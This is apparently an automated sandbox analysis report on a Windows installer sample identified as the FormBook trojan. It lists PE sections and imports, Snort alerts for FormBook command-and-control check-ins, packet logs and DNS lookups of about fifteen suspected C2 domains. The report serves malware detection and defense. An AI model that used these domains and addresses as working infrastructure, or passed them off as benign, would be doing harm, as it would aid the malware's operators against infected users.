                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                                                            RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                                                            RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                                                            RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                                                            RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                                                            RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                            USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                            SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/12/21-10:06:12.886360TCP1201ATTACK-RESPONSES 403 Forbidden804970934.102.136.180192.168.2.3
                                                                            04/12/21-10:06:24.103583TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:24.103583TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:24.103583TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971380192.168.2.352.15.160.167
                                                                            04/12/21-10:06:39.648039TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:39.648039TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:39.648039TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.3213.171.195.105
                                                                            04/12/21-10:06:56.074540TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.074540TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.074540TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.323.227.38.74
                                                                            04/12/21-10:06:56.251104TCP1201ATTACK-RESPONSES 403 Forbidden804972523.227.38.74192.168.2.3
                                                                            04/12/21-10:07:06.602644TCP1201ATTACK-RESPONSES 403 Forbidden8049726185.253.212.22192.168.2.3
                                                                            04/12/21-10:07:23.705914TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:23.705914TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:23.705914TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.3184.168.131.241
                                                                            04/12/21-10:07:34.592023TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:34.592023TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:34.592023TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.3104.21.24.135
                                                                            04/12/21-10:07:39.845866TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.3

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 12, 2021 10:06:12.700453043 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.742374897 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.742485046 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.742605925 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.786351919 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886359930 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886396885 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:12.886513948 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.886676073 CEST4970980192.168.2.334.102.136.180
                                                                            Apr 12, 2021 10:06:12.930332899 CEST804970934.102.136.180192.168.2.3
                                                                            Apr 12, 2021 10:06:17.975327015 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.179218054 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.181422949 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.181508064 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.385077000 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.420839071 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.420866966 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:18.421087027 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.421169043 CEST4971180192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:06:18.624491930 CEST8049711184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:06:23.963184118 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.103296995 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.103418112 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.103583097 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.240886927 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241137028 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241153955 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:24.241297960 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.241328001 CEST4971380192.168.2.352.15.160.167
                                                                            Apr 12, 2021 10:06:24.383333921 CEST804971352.15.160.167192.168.2.3
                                                                            Apr 12, 2021 10:06:39.591603041 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.647742033 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.647850037 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.648039103 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.703845978 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703871965 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703888893 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.703958988 CEST8049718213.171.195.105192.168.2.3
                                                                            Apr 12, 2021 10:06:39.704070091 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.704123974 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:39.704212904 CEST4971880192.168.2.3213.171.195.105
                                                                            Apr 12, 2021 10:06:45.028251886 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.261461020 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:45.261641979 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.261780977 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.496073008 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:45.496208906 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.496284008 CEST4972180192.168.2.3169.1.24.244
                                                                            Apr 12, 2021 10:06:45.720632076 CEST8049721169.1.24.244192.168.2.3
                                                                            Apr 12, 2021 10:06:50.677201033 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.800687075 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.801640987 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.801923037 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.925311089 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927325964 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927370071 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:50.927634954 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:50.927676916 CEST4972380192.168.2.3162.209.114.201
                                                                            Apr 12, 2021 10:06:51.051131964 CEST8049723162.209.114.201192.168.2.3
                                                                            Apr 12, 2021 10:06:56.031466961 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.073962927 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.074162960 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.074539900 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.116856098 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251104116 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251144886 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251162052 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251178026 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251194000 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251204967 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251220942 CEST804972523.227.38.74192.168.2.3
                                                                            Apr 12, 2021 10:06:56.251365900 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.251424074 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:06:56.251529932 CEST4972580192.168.2.323.227.38.74
                                                                            Apr 12, 2021 10:07:06.477828026 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537234068 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.537369967 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537733078 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602602005 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602643967 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602660894 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602829933 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602936029 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.662379980 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:17.967724085 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.187750101 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.187925100 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.188160896 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.403793097 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403820038 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403829098 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.406378984 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.406563044 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.622765064 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:23.509421110 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705492973 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.705681086 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705914021 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.901904106 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.957165956 CEST8049733184.168.131.241192.168.2.3

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 12, 2021 10:05:20.122581005 CEST5020053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:20.171334982 CEST53502008.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:22.757194042 CEST5128153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:22.820715904 CEST53512818.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:27.343539000 CEST4919953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:27.392163992 CEST53491998.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:29.547214031 CEST5062053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:29.596024990 CEST53506208.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:32.684887886 CEST6493853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:32.736320972 CEST53649388.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:53.382253885 CEST6015253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:53.450334072 CEST53601528.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:05:58.541904926 CEST5754453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:05:58.590631008 CEST53575448.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:06.595482111 CEST5598453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:06.644294024 CEST53559848.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:12.612741947 CEST6418553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:12.694369078 CEST53641858.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:15.645478010 CEST6511053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:15.694255114 CEST53651108.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:17.895628929 CEST5836153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:17.974059105 CEST53583618.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:19.354692936 CEST6349253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:19.413697004 CEST53634928.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:23.741298914 CEST6083153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:23.935321093 CEST53608318.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:27.774446011 CEST6010053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:27.826001883 CEST53601008.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:29.279805899 CEST5319553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:29.378269911 CEST53531958.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:35.918772936 CEST5014153192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:35.982625008 CEST53501418.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:36.155713081 CEST5302353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:36.227798939 CEST53530238.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:38.703079939 CEST4956353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:38.754638910 CEST53495638.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:39.501672983 CEST5135253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:39.590591908 CEST53513528.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:42.907608032 CEST5934953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:42.956401110 CEST53593498.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:43.847261906 CEST5708453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:43.896080017 CEST53570848.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:44.767106056 CEST5882353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:45.027236938 CEST53588238.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:45.253624916 CEST5756853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:45.313050985 CEST53575688.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:50.511313915 CEST5054053192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:50.675977945 CEST53505408.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:52.377207994 CEST5436653192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:52.426156998 CEST53543668.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:06:55.946742058 CEST5303453192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:06:56.030133963 CEST53530348.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:01.284339905 CEST5776253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:01.374114037 CEST53577628.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:06.384825945 CEST5543553192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:06.476445913 CEST53554358.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:10.516870975 CEST5071353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:10.594377041 CEST53507138.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:11.618877888 CEST5613253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:11.728017092 CEST53561328.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:12.890963078 CEST5898753192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:12.939604044 CEST53589878.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:14.240698099 CEST5657953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:14.289510965 CEST53565798.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:16.765417099 CEST6063353192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:16.814090014 CEST53606338.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:17.345175982 CEST6129253192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:17.966291904 CEST53612928.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:23.420985937 CEST6361953192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:23.506768942 CEST53636198.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:28.965080976 CEST6493853192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:29.043720007 CEST53649388.8.8.8192.168.2.3
                                                                            Apr 12, 2021 10:07:34.469288111 CEST6194653192.168.2.38.8.8.8
                                                                            Apr 12, 2021 10:07:34.549664021 CEST53619468.8.8.8192.168.2.3

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Apr 12, 2021 10:06:12.612741947 CEST192.168.2.38.8.8.80xe041Standard query (0)www.fibermover.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.895628929 CEST192.168.2.38.8.8.80xb7acStandard query (0)www.mojilifenoosa.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.741298914 CEST192.168.2.38.8.8.80x8bdStandard query (0)www.7chd.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:29.279805899 CEST192.168.2.38.8.8.80x4b0Standard query (0)www.bl927.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:39.501672983 CEST192.168.2.38.8.8.80xd579Standard query (0)www.hispekdiamond.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:44.767106056 CEST192.168.2.38.8.8.80xaf00Standard query (0)www.swashbug.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.511313915 CEST192.168.2.38.8.8.80x2d44Standard query (0)www.zagorafinancial.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:55.946742058 CEST192.168.2.38.8.8.80xdd2dStandard query (0)www.funnyfootballmugs.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:01.284339905 CEST192.168.2.38.8.8.80xffffStandard query (0)www.cdefenders.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:06.384825945 CEST192.168.2.38.8.8.80x8c4Standard query (0)www.przyczepy.netA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:11.618877888 CEST192.168.2.38.8.8.80x4de7Standard query (0)www.borderlesstrade.infoA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:17.345175982 CEST192.168.2.38.8.8.80x7657Standard query (0)www.3992199.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.420985937 CEST192.168.2.38.8.8.80x1eb0Standard query (0)www.montcoimmigrationlawyer.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:28.965080976 CEST192.168.2.38.8.8.80xfa46Standard query (0)www.missjeschickt.comA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.469288111 CEST192.168.2.38.8.8.80x436eStandard query (0)www.plaisterpress.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Apr 12, 2021 10:06:12.694369078 CEST8.8.8.8192.168.2.30xe041No error (0)www.fibermover.comfibermover.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:12.694369078 CEST8.8.8.8192.168.2.30xe041No error (0)fibermover.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.974059105 CEST8.8.8.8192.168.2.30xb7acNo error (0)www.mojilifenoosa.commojilifenoosa.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:17.974059105 CEST8.8.8.8192.168.2.30xb7acNo error (0)mojilifenoosa.com184.168.131.241A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)www.7chd.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:23.935321093 CEST8.8.8.8192.168.2.30x8bdNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:29.378269911 CEST8.8.8.8192.168.2.30x4b0Name error (3)www.bl927.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:39.590591908 CEST8.8.8.8192.168.2.30xd579No error (0)www.hispekdiamond.com213.171.195.105A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:45.027236938 CEST8.8.8.8192.168.2.30xaf00No error (0)www.swashbug.com169.1.24.244A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.675977945 CEST8.8.8.8192.168.2.30x2d44No error (0)www.zagorafinancial.comzagorafinancial.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:50.675977945 CEST8.8.8.8192.168.2.30x2d44No error (0)zagorafinancial.com162.209.114.201A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)www.funnyfootballmugs.comfunny-football-mugs.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)funny-football-mugs.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:06:56.030133963 CEST8.8.8.8192.168.2.30xdd2dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:01.374114037 CEST8.8.8.8192.168.2.30xffffName error (3)www.cdefenders.comnonenoneA (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:06.476445913 CEST8.8.8.8192.168.2.30x8c4No error (0)www.przyczepy.net185.253.212.22A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:11.728017092 CEST8.8.8.8192.168.2.30x4de7No error (0)www.borderlesstrade.infowww.borderlesstrade.info.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:17.966291904 CEST8.8.8.8192.168.2.30x7657No error (0)www.3992199.comk9cdna.51w4.comCNAME (Canonical name)IN (0x0001)
